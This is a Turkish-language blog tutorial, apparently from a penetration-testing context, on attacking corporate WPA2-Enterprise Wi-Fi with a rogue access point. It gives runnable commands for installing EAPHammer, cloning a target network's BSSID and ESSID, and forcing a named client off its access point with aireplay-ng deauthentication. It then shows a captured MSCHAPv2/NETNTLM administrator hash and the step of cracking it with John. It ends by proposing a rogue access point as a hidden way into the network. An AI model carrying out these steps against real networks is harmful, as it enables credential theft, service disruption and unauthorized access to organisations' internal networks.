24 Eylül 2018

WPA2-Enterprise Saldırısı [Rogue Access Point]

Kurumsal ortamlarda kullanılan wireless’lar güvenli olduğu düşünülmektedir. Personel wireless bağlanırken aynı parolayı kullanmıyorsa, her kullanıcı domainden kendine ait kullanıcı adını ve parolayı kullanarak güvenliği artırdığını düşünebilir. Wireless ile oluşan ağdan sonra kullanıcılar hassas ilgilerini bu ağ üzerinde paylaşabilir.

Wpa2’nin de kırıldığını duyduk ama bu beklediğimiz  gibi bir durum olmadı. Herkes bekliyordu ki; modemin parolası elde edilecek fakat öyle olmadı. Ortamda yakalan paketlerin sadece şifresiz protolkeri(http,ftp,…) izlemeye izin verdiği gözlenmiş. Şifreli bir protokol kullanıldığında ise paketlerin anlamı olmayacaktır. Bir de şöyle bir durum var; cihazlara güncelleme yapıldığında bu şifresiz protokollerinde izlenmesinin önüne geçildiğini duyduk. Krack için yayınlanan tool’unda şu anda sadece doğruluk testi yaptığı görebilirsiniz. Yani yakalanan paketleri size göstermeyecektir.

Kurumsal ortamlarda access point’lere bağlanıldığında kullanıcı adı ve parola sorar, sorgulama sonucu active domain sorgulama sonucu doğru ise radius bu doğrulamayı kabul ederek internet erişiminize izin verecektir. 

Biz sahte bir access point kuracağız ve kullanıcıyı bulunduğu ağdan düşürdükten sonra sahte access point’e bağlayacağız. Bunun için kali’yi kullanabiliriz.

Radius server ve sahte access point kurulumu için hostapd uygulaması içeren Eaphammer uygulamasını indirelim.

git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
indirdekten sonra kurulum için 

./kali-setup
Şimdi sertifika üretelim


./eaphammer --cert-wizard
Şimdi ortamı dinlemeye hazırlık yapalım.



Wlan0 başlatalım.



Ortamı dinlemeye başlayalım.


airodump-ng wlan0mon

Şimdi access point bssid ve essid bilgileri elde ettikten sonra sahte access point oluşturmak için ilerleyelim.
  • interface: hangi interfaceden yaptığınıza dikkat edin
  • bssid: Access point’in MAC adresi
  • essid: Yayın yaptığı isim bilgisi
  • channel: hangi kanalda yayın yapıyorsa (1-13)
  • auth: authentication türü (peap,ttls,open)
  • wpa: şifrele türü (1,2)
"Btrisk Test " essid bilgilerini ele geçirdikten sonra bu bilgileri sahte yayını yapacağımız access point başlatmak için kullanalım;

./eaphammer --interface wlan0mon --bssid BC:F5:AC:FB:DA:76 --essid "Btrisk Test" --channel 1 --auth open --wpa 2

Kullanıcı eğer ağa ilk kez dahil oluyorsa kullanıcı adını ve parolasını bizimle paylaşmış olacaktır. Burada ağa dahil olurken bize en yakın personel giriş yapacaktır. Yani sahte access point'e bağlanacaktır.



Personel bilgilerini girdikten sonra özetler aşağıdaki gibi olacaktır.



mschapv2: Fri Dec 15 08:24:56 2017
  username: administrator
  challenge: 05:86:cd:d2:2c:a2:dd:97
  response: 93:eb:79:03:89:0b:cc:f6:a3:3d:92:47:9c:ad:34:50:bc:cc:20:29:50:88:65:50
  jtr NETNTLM: administrator:$NETNTLM$0586cdd22ca2dd97$93eb7903890bccf6a33d92479cad3450bccc202950886550
Bu bilgileri bir dosyaya yazalım.



John tool’unu kullanarak bu hash değerini bulabiliriz.



Eğer ağa bağlı birisi varsa onu bağlı olduğu access point’den düşürebiliriz ve bizim sahte ağa otomatik dahil olabilir. Burada uzaklık farkı önemli bir etken olacaktır. İşletim sistemleri hangi access point  yakınsa ilk onunla iletişime geçmeye çalışacaktır. Android İşletim sisteminde otomatik bağlanmaktadır. Fakat Windows 10 bu mümkün olmadı. Diğer windows sürümlerinde de farklı olabilir.

Şimd bağlı olan bir client’i düşürerek sahte olan access point bağlamaya çalışalım.

Access point’in ve Client’in Mac adreslerini öğrenelim.




Belirlenen Client'i access point'den düşürmek için;


aireplay-ng  -0 1000 -a BC:F5:AC:FB:DA:76  -c F0:D5:BF:AC:7F:5B wlan0mon

Bir süre sonra client bağlantısı yavaşlayacak ve düşecektir.

Client düştükten sonra cihazlar otomatik bağlanmaya çalıştığında sahte olan access point’e bağlanabilir.  Şifresiz olan trafikler aşağıdaki gibi izlenebilecektir. 




Bunların dışında farklı bir saldırı yöntemi de, network'e bağlanan saldırı access point ile farklı bir SSID tanımlanarak ağ dışarı açılabilir. Saldırgan access point'i kurduğundan dolayı erişim bilgileri sadece kendisinde olacaktır. Böylece saldırgan için yeni bir access point oluşturulmuş ve kimsenin bilmediği bir erişim ile ağa dahil olmuş olabilir.